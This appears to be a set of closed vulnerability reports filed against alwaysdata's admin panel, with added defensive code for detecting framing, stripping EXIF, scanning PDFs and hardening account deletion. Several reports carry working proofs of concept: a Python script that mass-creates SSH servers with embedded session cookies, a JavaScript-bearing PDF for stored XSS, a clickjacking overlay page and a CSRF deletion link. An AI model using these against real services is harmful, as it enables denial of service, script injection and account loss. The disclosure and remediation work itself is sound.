|
74 | Closed | Bypassing Two-Factor Authentication via Account Deactiv ... | waloodi_109 |
Task Description
Bypassing Two-Factor Authentication via Account Deactivation
Hello Team,
I hope you are doing well. I found a serious issue in https://admin.alwaysdata.com which allows bypassing two-factor authentication via account deactivation.
The vulnerability arises from a logical flaw in the account recovery and 2FA enforcement processes. Specifically, after deactivating an account, users can take over and log in without being prompted for 2FA. The 2FA mechanism, which is designed to provide an additional layer of security, is effectively bypassed.
Steps To Reproduce
1. Go to https://admin.alwaysdata.com and sign up with example@gmail.com.
2. Then go to the admin details section, add some details (first name, last name, etc.) and activate 2FA.
3. After activating 2FA, submit and save the details.
4. After saving the details, click on the "Delete this profile" button at the top right and submit whatever message you want.
5. Your account is deleted without asking for password confirmation, 2FA is also deactivated, and an attacker can easily take over the account.
Note: This is possible only when the user forgot to log off the account at a cafe or on someone else's PC; the attacker then recreates an account with this email address and reconfigures 2FA to take over the account.
Regards,
Waleed Anwar
|
|
73 | Closed | Unlimited SSH Server Creation Vulnerability on AlwaysDa ... | admsec |
Task Description
# Unlimited SSH Server Creation Vulnerability on AlwaysData
## Summary
There is no limit on the number of SSH servers that can be created by a user on the AlwaysData platform. This vulnerability allows for unauthorized resource exhaustion, which could lead to service degradation or denial of service (DoS).
## Steps to Reproduce
1. Log in to your AlwaysData account.
2. Navigate to the SSH server creation page: `https://admin.alwaysdata.com/ssh/add/`.
3. Submit the form to create a new SSH server using a valid name and password.
4. Repeat the above step multiple times with different names like `jhoneone_1002`, `jhoneone_1003`, etc.
5. Observe that there is no limit imposed on the number of SSH servers that can be created, leading to potential resource exhaustion.
## Impact
- Resource Exhaustion: An attacker can create an unlimited number of SSH servers, potentially exhausting the resources allocated to other users on the platform.
- Denial of Service: Continuous server creation could degrade the platform's performance or lead to a denial of service.
## Recommendations
- Implement Limits: Set a reasonable limit on the number of SSH servers that can be created per user.
- Monitor for abnormal SSH server creation patterns and implement rate limiting to prevent abuse.
## Python Script to Exploit the Vulnerability
```python
import requests

# Configuration
url = "https://admin.alwaysdata.com/ssh/add/"
headers = {
    "Host": "admin.alwaysdata.com",
    # Cookies of the logged-in account. The csrftoken cookie and the
    # csrfmiddlewaretoken form field below must come from the same session,
    # otherwise Django rejects the POST with 403.
    "Cookie": "csrftoken=dnNRG2ExW88JR4GFKyeRRbD0JMV6E7IH; django_language=en; sessionid=q25k858xtrmg95b2t486xg7snokn99ls",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Referer": "https://admin.alwaysdata.com/ssh/add/",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "https://admin.alwaysdata.com",
    "Dnt": "1",
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-User": "?1",
    "Te": "trailers"
}

# Function to create an SSH server
def create_ssh_server(session, csrf_token, username, password="AAAaaa123###"):
    data = {
        "csrfmiddlewaretoken": csrf_token,
        "name": username,
        "password": password,
        "home_directory": "",
        "shell": "BASH",
        "can_use_password": "on",
        "annotation": "",
        "submit": ""
    }
    response = session.post(url, headers=headers, data=data)
    return response.status_code, response.text

# Main script
if __name__ == "__main__":
    with requests.Session() as session:
        # Replace the csrf_token below with your own token from your account
        csrf_token = "hpjP7TYZxZLeNcxhqG3fC6vZkwecJIc4kCWwDLsmjXJNu63M047Wj7YPT8Z8dFKB"
        for i in range(1002, 1100):  # Create multiple servers
            username = f"jhoneone_{i}"
            status_code, response_text = create_ssh_server(session, csrf_token, username)
            print(f"Status Code: {status_code}, Username: {username}")
            # Optionally, you can log the response_text for debugging purposes
```
|
|
71 | Closed | Title: Unauthorized Email Sending Exploit** in [alwaysd ... | monty099 |
Task Description
Title: Unauthorized Email Sending Exploit in [alwaysdata.com]
Summary:
A vulnerability has been discovered in the site's email handling system. The site assigns each user a unique email address. However, it is possible to send an email from any email account, bypassing the intended email restrictions and validation mechanisms.
Vulnerability Details:
- Type: Email Spoofing
- Impact: Unauthorized email sending
- Affected Component: Email Handling System
Description:
The application generates a unique email address for each user. However, it is possible to exploit the system to send emails from any arbitrary email address. This issue arises due to insufficient validation of the email sender’s address.
Proof of Concept:
1. Exploit Steps:
- Use an email client or script to send an email through the application.
- Modify the "From" address to any arbitrary email address, not restricted to the user's assigned address.
2. Result:
- The email is sent successfully.
Follow the steps in the video: https://admin.alwaysdata.com/support/77431/376905-bandicam%202024-08-20%2003-19-32-375.mp4
Impact:
This vulnerability allows an attacker to send emails appearing as if they are from any user.
|
|
70 | Closed | ClickJacking Leads to deletion of user profile | elit3pwner |
Task Description
Description: There is a clickjacking vulnerability at the https://admin.alwaysdata.com/admin/details/ endpoint, and deleting a profile needs just two clicks.
Steps to reproduce:
1) Open your browser and go to https://admin.alwaysdata.com/admin/details/
2) Create an HTML file that overlays the "Delete this profile" icon and then the submit button.
Impact: An admin's account can be deleted in two clicks.
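Added example, not code from the report or from alwaysdata: the precondition for the attack above is that a foreign origin may frame the page, and that is decided entirely by two response headers, X-Frame-Options and the Content-Security-Policy frame-ancestors directive (the latter wins when both are present). The function below evaluates a header set against an embedding origin, with the report's vulnerable case and a hardened case as constructed samples. The overlay HTML, pixel offsets and origins are illustrative assumptions.

```python
"""Decide from HTTP response headers whether a page can be framed (clickjacking precondition)."""
from __future__ import annotations

# Constructed illustration of the report's step 2: a fully transparent iframe of the
# admin page sits above a decoy button, so the victim's two clicks land on
# "Delete this profile" and then on the confirmation's submit button.
OVERLAY_POC_HTML = """<!doctype html>
<style>
  iframe { position:absolute; top:0; left:0; width:1200px; height:900px; opacity:0; z-index:2; }
  button { position:absolute; top:118px; left:1010px; z-index:1; }
</style>
<button>Claim prize</button>
<iframe src="https://admin.alwaysdata.com/admin/details/"></iframe>
"""


def csp_frame_ancestors(csp: str) -> list[str] | None:
    """Return the frame-ancestors source list, or None when the directive is absent.
    An empty source list is equivalent to 'none' per the CSP specification."""
    for directive in csp.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]] or ["'none'"]
    return None


def framing_allowed(headers: dict[str, str], page_origin: str, embedder_origin: str) -> bool:
    """True if a browser would render page_origin's response inside a frame on embedder_origin.

    Modelled sources: 'none', 'self', scheme sources such as https:, and exact origins.
    Wildcard hosts are not modelled. Header names are matched case-insensitively.
    """
    h = {k.lower(): v for k, v in headers.items()}
    csp = h.get("content-security-policy")
    if csp is not None:
        sources = csp_frame_ancestors(csp)
        if sources is not None:                       # frame-ancestors takes precedence over XFO
            for src in sources:
                if src == "'self'" and embedder_origin == page_origin:
                    return True
                if src.endswith(":") and embedder_origin.startswith(src + "//"):
                    return True
                if src == embedder_origin.lower():
                    return True
            return False                              # directive present, embedder not listed ('none' included)
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return embedder_origin == page_origin
    return True                                       # no framing restriction at all


def clickjacking_exposed(headers: dict[str, str], page_origin: str) -> bool:
    """Can an arbitrary third-party origin frame this page? (What the report relies on.)"""
    return framing_allowed(headers, page_origin, "https://attacker.invalid")


# Constructed samples: the vulnerable response carries nothing that restricts framing;
# the hardened one sets both headers so old and new browsers are covered.
VULNERABLE_HEADERS = {"Content-Type": "text/html; charset=utf-8"}
HARDENED_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
}
```

A quick `curl -sI https://admin.alwaysdata.com/admin/details/` and a look at the two headers is the manual equivalent of `clickjacking_exposed`; a sensitive action should additionally not be performable in two clicks without a password or token check, which framing protection alone does not address.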
|
|
69 | Closed | EXIF metadata not stripped | elit3pwner |
Task Description
Summary: When uploading images in the ticket option, the EXIF metadata is not removed or changed in any way.
Description: When answering in a ticket, you can upload a file, and if you upload an image with EXIF metadata on it, it isn't stripped. This can lead to disclosure of the location where the photo was taken or other personal information about the photo uploader if their group is public, as anyone can download the logo and check the metadata.
Steps To Reproduce:
1) Create a ticket.
2) Upload an image with EXIF metadata.
3) Now download the same image and check the metadata.
Link to POC: https://drive.google.com/file/d/1KflN8xTcF6Gq-0x1wo-n65KkT9ScNHMl/view?usp=sharing
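Added example, not code from the report or from alwaysdata: the fix for the above is to strip metadata server-side before storing the upload. A JPEG is a sequence of marker segments, so the metadata can be removed by walking that structure and dropping the APP1 (Exif and XMP), APP13 (IPTC/Photoshop) and COM segments while keeping the JFIF header and the codec tables the decoder needs. The sample file is constructed inline; it has enough structure to parse but is not a viewable picture.

```python
"""Strip EXIF/XMP/IPTC/comment segments from a JPEG by walking its marker structure."""
from __future__ import annotations

import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA            # start of image, end of image, start of scan
APP0, APP1, APP13, COM = 0xE0, 0xE1, 0xED, 0xFE
EXIF_HEADER = b"Exif\x00\x00"
XMP_HEADER = b"http://ns.adobe.com/xap/1.0/\x00"


def _label(marker: int, payload: bytes) -> str:
    if marker == COM:
        return "COM"
    if marker == APP13:
        return "APP13/IPTC"
    return "APP1/Exif" if payload.startswith(EXIF_HEADER) else "APP1/XMP"


def strip_jpeg_metadata(data: bytes) -> tuple[bytes, list[str]]:
    """Return (cleaned_bytes, labels_of_removed_segments).

    Each segment before SOS is [0xFF, marker, 2-byte big-endian length that includes
    the length field itself, payload]. Exif lives in APP1, XMP in a second APP1 with its
    own header, IPTC/Photoshop data in APP13, free text in COM. APP0 (JFIF) and the codec
    tables (DQT, DHT, SOF, ...) are kept. From SOS onward the bytes are entropy-coded scan
    data terminated by EOI and are copied verbatim.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    out = bytearray(data[:2])
    removed: list[str] = []
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        while pos + 1 < len(data) and data[pos + 1] == 0xFF:   # fill bytes before a marker are legal
            pos += 1
        marker = data[pos + 1]
        if marker == SOS:
            out += data[pos:]
            return bytes(out), removed
        if marker == EOI:
            out += data[pos:pos + 2]
            return bytes(out), removed
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        seg_end = pos + 2 + length
        payload = data[pos + 4:seg_end]
        drop = marker in (COM, APP13) or (
            marker == APP1 and (payload.startswith(EXIF_HEADER) or payload.startswith(XMP_HEADER))
        )
        if drop:
            removed.append(_label(marker, payload))
        else:
            out += data[pos:seg_end]
        pos = seg_end
    raise ValueError("truncated JPEG: no SOS or EOI marker found")


def list_metadata(data: bytes) -> list[str]:
    """Labels of the metadata segments present, without modifying anything."""
    return strip_jpeg_metadata(data)[1]


def _segment(marker: int, payload: bytes) -> bytes:
    return bytes([0xFF, marker]) + struct.pack(">H", len(payload) + 2) + payload


def make_sample_jpeg() -> bytes:
    """Constructed input: JFIF header, an Exif APP1 holding an empty TIFF IFD (where a real
    camera stores GPS and device tags), a comment, a quantisation table, a scan, EOI."""
    jfif = _segment(APP0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    tiff = b"MM\x00\x2a" + b"\x00\x00\x00\x08" + b"\x00\x00" + b"\x00\x00\x00\x00"
    exif = _segment(APP1, EXIF_HEADER + tiff)
    comment = _segment(COM, b"taken at home, 2024-06-01")
    dqt = _segment(0xDB, b"\x00" + bytes(64))
    sos = _segment(SOS, b"\x01\x01\x00\x00\x3f\x00")
    return b"\xff\xd8" + jfif + exif + comment + dqt + sos + b"\x12\x34\x56" + b"\xff\xd9"
```

Run `list_metadata()` on a download to confirm what the server hands back; an upload pipeline should call `strip_jpeg_metadata()` (or re-encode the image) before persisting, and apply the same idea to PNG text chunks and to other formats it accepts.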
|
|
68 | Closed | *Title:*: Bypassing Email Address Restriction for Accou ... | monty099 |
Task Description
*Title:* Bypassing Email Address Restriction for Account Creation
*Description:* The ban on an email address can be bypassed.
An example is the following e-mail address: "admin@alwaysdata.com"
*Steps to Reproduce:*
1. Attempt to create an account using a blocked email address. The system will display a message stating that the email address is blocked and prevent account creation.
2. Create an account using a different email address.
3. Once the account is successfully created, navigate to the account settings.
4. Change the email address of the account to the previously blocked email address.
5. Save the changes. The email address will be updated to the blocked one, bypassing the initial restriction.
*Impact:* This issue allows users to circumvent email address restrictions.
*Recommendation:* Implement server-side checks to ensure that email address restrictions are enforced consistently across all account management functionalities. Additionally, review the email update process to prevent such bypasses.
*POC:*
poc1: https://admin.alwaysdata.com/support/77431/375912-poc.22.png
poc2: https://admin.alwaysdata.com/support/77431/375911-bandicam%202024-08-05%2009-36-57-769.mp4
|
|
67 | Closed | *Title:* Account Creation and Impersonation Vulnerabili ... | monty099 |
Task Description
*Title:* Account Creation and Impersonation Vulnerability in [admin.alwaysdata.com]
*Summary:* It is possible to create a new account on the site using the domain name admin1@alwaysdata.com. After creating this account, the username can be changed to that of a legitimate site administrator. This vulnerability allows the account to generate support tickets and invite users; in this way the attacker can defraud users.
*Steps to Reproduce:*
1. Register a new account on the site using the email admin1@alwaysdata.com, or any other name.
2. Change the account username to that of a real site administrator.
3. Use the account to create a support ticket and invite users.
poc: https://admin.alwaysdata.com/support/77431/375910-poc.alwaysdata.png
*Impact:* This vulnerability enables attackers to impersonate site administrators within the support system, which enables the attacker to impersonate the administrators of the site and deceive users.
*Recommendation:* To mitigate this risk, implement restrictions to prevent the creation of accounts with administrative email domains.
|
|
66 | Closed | *Title:* Insufficient Validation Allows Multiple Accoun ... | monty099 |
Task Description
*Title:* Insufficient Validation Allows Multiple Accounts Creation Under Single Subscription Plan
*Description:* A vulnerability has been identified in the subscription management system which allows users to create multiple accounts under the same subscription plan. This issue can be exploited to bypass restrictions on the number of accounts per plan and gain unauthorized benefits.
*Steps to Reproduce:*
1. *Create an Account:*
Sign up for a new account with a specific subscription plan (e.g., "Free Plan").
2. *Create a Duplicate Account:*
Attempt to create another account using the same subscription plan as the first account.
Notice that the system does not prevent the creation of multiple accounts under the same subscription plan.
3. *Create a Similar Plan Account:*
From the newly created account, sign up for a subscription plan similar to the first account's plan.
4. *Send an Invitation:*
Send an invitation from the second account to the first account to become an admin of the plan created by the second account.
5. *Accept the Invitation:*
After accepting the invitation, the first account will now have two accounts under the same subscription plan.
I sent a proof of concept: https://admin.alwaysdata.com/support/77431/375639-poc.mp4
*Impact:*
This vulnerability allows users to circumvent subscription limitations by creating multiple accounts under the same plan.
|
|
64 | Closed | Insecure Account Deletion | sharmaraghs |
Task Description
Summary: The removal of an account is one of the sensitive parts of a web application that need to be protected; therefore removing an account should validate the authenticity of the user. However, I have found that when removing an account, the system did not require the user to input the account password.
Steps To Reproduce:
1. Create an account on https://alwaysdata.com
2. Go to the My account section and choose DELETE ACCOUNT.
3. Click on delete and you will see that it deletes the account without any kind of verification or password confirmation.
Impact / Exploit Scenario: The user logs in on a shared computer (office, library, cafe) and leaves the account open. An intruder comes and tries to delete the user's account. The intruder can easily delete the account because the system does not protect it by asking for the password to validate that the person deleting the account is the real user.
Regards, Raghav Sharma
POC Link -: https://drive.google.com/file/d/1iu1gb0l44_sTqG2Ol-ZTbLc0ZKHYkO-f/view?usp=drive_link
|
|
63 | Closed | Stored XSS Via Upload Document | milapshah1 |
Task Description
Vulnerability Explanation-When a user uploads a document containing malicious code, such as JavaScript, to the web application, it gets stored on the server without proper validation or sanitization. This allows an attacker to inject and execute arbitrary scripts within the application's context.
Impact-This vulnerability enables attackers to execute unauthorized scripts on the client-side, leading to session hijacking, data theft, or defacement of the web application. It can compromise user privacy, damage the application's reputation, and potentially expose sensitive information to malicious actors.
Severity-High
Steps to reproduce:
1) Go to support: https://admin.alwaysdata.com/support/
2) Open a new ticket.
3) Save this code as a.pdf:

```
%PDF-1.3
%âãÏÓ
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>>
endobj
3 0 obj
<</AA
<</O
<</JS
(
try {
app.alert\("xss"\)
} catch \(e\) {
app.alert\(e.message\);
}
)
/S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>
endobj
4 0 obj
<</Length 21>>
stream
BT /F1 24 Tf ET
endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer
<</Root 1 0 R /Size 5>>
startxref
493
%%EOF
```

4) Upload this file.
5) Open the ticket.
6) Click on the uploaded malicious PDF file; the alert is reflected.
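Added example, not code from the report or from alwaysdata: two controls for the upload path the PoC above abuses. First, a scanner for the PDF entries that carry active content (/AA and /OpenAction as triggers, /JS and /JavaScript as payload, plus /Launch and friends), which also decodes the #xx hex escapes PDF names allow and inflates Flate-compressed streams because object streams can hide whole dictionaries there. Second, the response headers for serving a stored upload as a download rather than rendering it in the application's origin. POC_PDF is a compacted copy of the report's payload; the other inputs are constructed.

```python
"""Detect PDF active content in an upload; serve stored uploads as downloads."""
from __future__ import annotations

import re
import zlib

# Triggers (/AA, /OpenAction), script carriers (/JS, /JavaScript) and other outward-reaching actions.
ACTIVE_CONTENT_NAMES = {"AA", "OpenAction", "JS", "JavaScript", "Launch", "SubmitForm", "RichMedia", "EmbeddedFile"}

_NAME_RE = re.compile(rb"/([^\s/<>\[\]()%]+)")                        # one PDF name token
_STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)   # stream bodies (often compressed)
_HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def decode_name(raw: bytes) -> str:
    """PDF names may hex-escape any byte as #xx (/J#53 is /JS); normalise before matching."""
    return _HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def _views(pdf: bytes):
    """Yield the syntax outside streams, then each stream body: inflated when Flate-encoded,
    otherwise raw. Raw compressed bytes are never pattern-matched, so results are stable."""
    yield _STREAM_RE.sub(b"stream\nendstream", pdf)
    for m in _STREAM_RE.finditer(pdf):
        body = m.group(1)
        try:
            yield zlib.decompressobj().decompress(body)   # tolerates a trailing byte eaten by the regex
        except zlib.error:
            yield body


def find_active_content(pdf: bytes) -> list[str]:
    """Names from ACTIVE_CONTENT_NAMES in order of first appearance; [] means none found.
    Deliberately conservative: a matching name inside a string literal also counts."""
    found: list[str] = []
    for view in _views(pdf):
        for m in _NAME_RE.finditer(view):
            name = decode_name(m.group(1))
            if name in ACTIVE_CONTENT_NAMES and name not in found:
                found.append(name)
    return found


def accept_upload(pdf: bytes) -> tuple[bool, list[str]]:
    findings = find_active_content(pdf)
    return not findings, findings


def download_headers(filename: str) -> dict[str, str]:
    """Headers for serving a stored upload: no inline rendering, no MIME sniffing, no script
    context. The filename is reduced to a safe ASCII subset so it cannot break the header."""
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", filename).lstrip(".") or "download"
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",
    }


# Compacted copy of the report's payload: a page-open action (/AA /O) running JavaScript.
POC_PDF = b"""%PDF-1.3
1 0 obj <</Pages 2 0 R /Type /Catalog>> endobj
2 0 obj <</Count 1 /Kids [3 0 R] /Type /Pages>> endobj
3 0 obj <</AA <</O <</JS (try { app.alert\\("xss"\\) } catch \\(e\\) { app.alert\\(e.message\\); }) /S /JavaScript>>>>
/Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R /Type /Page>> endobj
4 0 obj <</Length 21>>
stream
BT /F1 24 Tf ET
endstream
endobj
trailer <</Root 1 0 R /Size 5>>
%%EOF
"""

# Constructed: the same idea via the catalog's /OpenAction, with the names hex-escaped.
OBFUSCATED_PDF = b"1 0 obj <</Type /Catalog /OpenAction <</S /J#61vaScript /J#53 (app.alert\\(1\\))>>>> endobj"

# Constructed: a Flate-compressed object stream carrying the action dictionary.
_COMPRESSED = zlib.compress(b"<</S /JavaScript /JS (app.alert\\(1\\))>>")
FLATE_PDF = (b"%PDF-1.5\n5 0 obj <</Type /ObjStm /Filter /FlateDecode /Length "
             + str(len(_COMPRESSED)).encode() + b">>\nstream\n" + _COMPRESSED + b"\nendstream\nendobj\n%%EOF\n")

# Constructed: an ordinary one-page document with no actions at all.
CLEAN_PDF = (b"%PDF-1.3\n1 0 obj <</Pages 2 0 R /Type /Catalog>> endobj\n"
             b"2 0 obj <</Count 1 /Kids [3 0 R] /Type /Pages>> endobj\n"
             b"3 0 obj <</Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]>> endobj\n%%EOF\n")
```

Rejecting scripted PDFs at upload stops the payload; `download_headers()` is the control that matters even when the scanner misses something, because a file that is never rendered inline cannot execute in the ticket system's origin. Serving uploads from a separate domain adds a third layer.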
|
|
62 | Closed | Stored XSS Via Upload Document | milapshah1 |
Task Description
Vulnerability Explanation-When a user uploads a document containing malicious code, such as JavaScript, to the web application, it gets stored on the server without proper validation or sanitization. This allows an attacker to inject and execute arbitrary scripts within the application's context.
Impact-This vulnerability enables attackers to execute unauthorized scripts on the client-side, leading to session hijacking, data theft, or defacement of the web application. It can compromise user privacy, damage the application's reputation, and potentially expose sensitive information to malicious actors.
|
|
58 | Closed | Missing Invitation Link for Existing Users | mudhaxk |
Task Description
Summary:
A vulnerability was discovered where a user with an existing account is not sent an invitation link when added to an organization, potentially leading to confusion and unauthorized access.
Impact:
- User unable to access organization resources
- Potential unauthorized access to sensitive information
- Increased risk of account takeover
Expected Result:
- User with an existing account should receive an invitation link to join the organization
- User should be prompted to accept the invitation and join the organization
Actual Result:
- No invitation link is sent to the user
- User is not prompted to accept the invitation and join the organization
Severity according to CVSS 3:
- Attack Vector (AV): Network (N)
- Attack Complexity (AC): Low (L)
- Privileges Required (PR): None (N)
- User Interaction (UI): None (N)
- Sensitivity (S): Medium (M)
- Confidentiality (C): Medium (M)
- Integrity (I): Medium (M)
- Availability (A): Medium (M)
CVSS 3 Score: 6.5 (Medium)
Steps to Reproduce:
1. Add a user with an existing account to an organization
2. Observe no invitation link being sent to the user
3. Verify the user's inability to access organization resources
Recommended Fix:
1. Implement automatic invitation link sending for existing users
2. Ensure users receive a prompt to accept the invitation and join the organization
3. Validate user accounts and organization membership to prevent unauthorized access
Conclusion:
This vulnerability poses a medium risk to user access and organization security. Implementing automatic invitation link sending for existing users will ensure proper access and prevent unauthorized access attempts.
|
|
57 | Closed | Lack of Password Confirmation on Delete Account and GET ... | mudhaxk |
Task Description
Summary:
A vulnerability was discovered where the delete account functionality lacks password confirmation and is vulnerable to GET-based CSRF, potentially allowing attackers to delete accounts without authorization.
Impact:
- Unauthorized account deletion
- Potential data loss
- Increased risk of account takeover
Expected Result:
- Password confirmation should be required to delete an account
- CSRF protection should prevent unauthorized requests
Actual Result:
- No password confirmation is required to delete an account
- GET-based CSRF vulnerability allows unauthorized account deletion
Steps to Reproduce:
1. Login to the application
2. Trick the user into clicking a malicious link to delete their account: https://admin.alwaysdata.com/admin/details/1/delete
3. User clicks submit
4. Observe the account being deleted without password confirmation
Recommended Fix:
1. Implement password confirmation requirement for delete account functionality
2. Implement CSRF protection for delete account functionality
3. Validate requests to prevent unauthorized account deletion
Conclusion:
This vulnerability poses a critical risk to user accounts and data. Implementing password confirmation and CSRF protection for delete account functionality will prevent unauthorized account deletion and ensure the security and integrity of user accounts.
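Added example serving tasks 74, 64 and 57 above, all of which concern account deletion without re-authentication; it is not alwaysdata's code. The first handler reproduces the reported behaviour: any request that reaches the URL with a valid session deletes the account. The hardened handler accepts only a POST, checks a CSRF token bound to the server-side session, refuses cross-site requests that carry Fetch Metadata, re-verifies the current password and, when the user has enrolled TOTP-based 2FA, requires a valid one-time code (so deletion cannot be used to shed the second factor, the point of task 74). The `Request`, `Account` and handler names are hypothetical; the demo store and session are constructed, and the TOTP secret reuses the RFC 6238 test-vector key.

```python
"""Delete-account endpoint before and after hardening (re-authentication, CSRF, 2FA)."""
from __future__ import annotations

import hashlib
import hmac
import secrets
import struct
import time
from dataclasses import dataclass, field


@dataclass
class Account:
    password_hash: bytes
    salt: bytes
    totp_secret: bytes | None = None     # None means 2FA is not enrolled
    deleted: bool = False


@dataclass
class Request:
    method: str
    form: dict[str, str]
    session: dict[str, str]              # server-side session: logged-in user, CSRF secret
    headers: dict[str, str] = field(default_factory=dict)


@dataclass
class Response:
    status: int
    body: str


PBKDF2_ROUNDS = 100_000


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def totp_code(secret: bytes, now: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP over HMAC-SHA1, the algorithm authenticator apps implement."""
    counter = struct.pack(">Q", now // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    value = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return f"{value % 10 ** digits:0{digits}d}"


def totp_valid(secret: bytes, code: str, now: int) -> bool:
    """Accept the current 30 s step and one step either side to absorb clock skew."""
    return any(hmac.compare_digest(totp_code(secret, now + d).encode(), code.encode()) for d in (-30, 0, 30))


def delete_account_insecure(req: Request, accounts: dict[str, Account]) -> Response:
    """Reported behaviour: arriving at the URL with a session is enough; no token, password or 2FA."""
    user = req.session.get("user")
    if user not in accounts:
        return Response(401, "not logged in")
    accounts[user].deleted = True
    return Response(200, f"{user} deleted")


def delete_account(req: Request, accounts: dict[str, Account], now: int | None = None) -> Response:
    """Hardened: state changes only on an authenticated, same-origin POST that re-proves identity."""
    user = req.session.get("user")
    if user not in accounts:
        return Response(401, "not logged in")
    if req.method != "POST":
        return Response(405, "use POST")                       # a link or <img src> can never trigger it
    # Fetch Metadata is sent by current browsers; when absent (curl, old browsers) the token check below
    # remains the primary control, so the header is treated as defence in depth only.
    if req.headers.get("Sec-Fetch-Site", "same-origin") not in ("same-origin", "none"):
        return Response(403, "cross-site request refused")
    expected = req.session.get("csrf_token", "")
    supplied = req.form.get("csrfmiddlewaretoken", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return Response(403, "bad CSRF token")
    acct = accounts[user]
    candidate = hash_password(req.form.get("password", ""), acct.salt)
    if not hmac.compare_digest(candidate, acct.password_hash):
        return Response(401, "password confirmation failed")
    if acct.totp_secret is not None:
        current = now if now is not None else int(time.time())
        if not totp_valid(acct.totp_secret, req.form.get("otp", ""), current):
            return Response(401, "second factor required")
    acct.deleted = True
    return Response(200, f"{user} deleted")


def make_demo_store(password: str = "correct horse battery",
                    totp_secret: bytes | None = b"12345678901234567890") -> tuple[dict[str, Account], dict[str, str]]:
    """Constructed account and session for the demo (the TOTP key is the RFC 6238 test-vector secret)."""
    salt = secrets.token_bytes(16)
    accounts = {"alice": Account(hash_password(password, salt), salt, totp_secret)}
    session = {"user": "alice", "csrf_token": secrets.token_urlsafe(32)}
    return accounts, session
```

The ordering matters: method and origin checks are cheap and reject the drive-by cases, the token check defeats a forged same-site form, and the password plus one-time code defeat the shared-computer scenario from tasks 74 and 64, where the attacker has the session but not the secrets.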
|
|
56 | Closed | Unauthorized Organization Creation | mudhaxk |
Task Description
Summary: A vulnerability was discovered where a user who is not given permission on invite is still able to create a new organization, potentially leading to unauthorized access and data breaches.
Impact:
- Unauthorized access to sensitive information
- Potential data breaches
- Increased risk of account takeover
Expected Result:
- User without permission should not be able to create a new organization
- User should only be added to the organization with proper permission
Actual Result:
- User without permission is given a new organization on accepting invite
- User is added to the new organization with unnecessary permissions
Steps to Reproduce:
1. Invite a user without permission
2. Observe the user creating a new organization
3. Verify the user's unnecessary permissions in the new organization
Recommended Fix:
1. Implement permission checks to prevent unauthorized organization creation
2. Ensure users are only added to organizations with proper permission
3. Validate user permissions on each request to prevent abuse
Conclusion:
This vulnerability poses a critical risk to sensitive information and user accounts. Implementing proper permission checks and validation will prevent unauthorized access and ensure the security and integrity of user accounts.
|
|
55 | Closed | Session Not Invalidated on Permission Change | mudhaxk |
Task Description
Summary:
A vulnerability was discovered where the session is not invalidated when permissions are changed, potentially allowing attackers to access sensitive information without proper authorization.
Impact:
- Unauthorized access to sensitive information
- Potential data breaches
- Increased risk of account takeover
Expected Result:
- Session should be invalidated when permissions are changed
- User should be prompted to re-authenticate with new permissions
Actual Result:
- Session remains active after permission change
- User retains access to sensitive information without re-authentication
Steps to Reproduce:
1. {Browser A → Admin} Login to the application
2. {Browser A → Admin} Change permissions for the user
3. {Browser B → User} Login to the application
4. Observe the session remaining active
5. Attempt to access sensitive information
Recommended Fix:
1. Invalidate the session when permissions are changed
2. Require users to re-authenticate with new permissions
3. Implement additional security measures, such as token-based authentication and secure cookie management
Conclusion:
This vulnerability poses a critical risk to sensitive information and user accounts. Invalidating the session when permissions are changed will prevent unauthorized access and ensure the security and integrity of user accounts.
|
|
54 | Closed | Lack of Verification Email | sanjoy804 |
Task Description
### Summary
The website does not verify email addresses during the account creation process, which can lead to various security issues such as spam, abuse, and account recovery problems.
### Steps to Reproduce
1. Go to the account creation page: https://www.alwaysdata.com/en/register/
2. Enter any email address and complete the registration process.
3. Notice that no email verification step is required.
### Impact
- Spam and Abuse: Unverified accounts can be used to flood the system with spam or perform malicious activities.
- User Impersonation: An attacker can use someone else's email address, leading to possible impersonation issues.
